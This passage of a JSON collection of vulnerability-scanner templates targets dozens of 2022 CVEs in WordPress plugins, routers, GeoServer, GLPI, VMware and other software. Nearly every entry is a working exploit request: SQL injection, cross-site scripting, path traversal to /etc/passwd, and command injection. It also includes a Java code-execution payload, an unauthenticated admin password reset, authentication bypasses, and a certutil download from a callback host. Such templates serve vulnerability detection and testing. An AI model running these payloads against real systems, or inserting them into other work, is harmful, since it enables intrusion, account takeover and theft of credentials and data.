name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>","<h2>Add a new server</h2>","<title>phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-40022","info":{"name":"Symmetricom SyncServer Unauthenticated - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /controller/ping.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/controller/ping.php\n\ncurrentTab=ping&refreshMode=&ethDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+)"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-0864","info":{"name":"UpdraftPlus < 1.22.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=updraftplus&updraft_interval\"></script><script>confirm(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>confirm(document.domain)</script>","updraftplus"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24384","info":{"name":"SmarterTools SmarterTrack - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n\n"],"matchers":[{"type":"word","words":["\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"","smartertrack"],"condition":"and"}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n","HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(header_1, 'wordpress_')","contains(header_1, 'Location')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 != 302"]}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-46443","info":{"name":"Bangresto - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bangresto-main/staff/process.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /bangresto-main/staff/insertorder.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;\n\nitemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35914","info":{"name":"GLPI <=10.0.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26960","info":{"name":"elFinder <=2.1.60 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47615","info":{"name":"LearnPress Plugin < 4.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["\"status\":","\"pagination\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 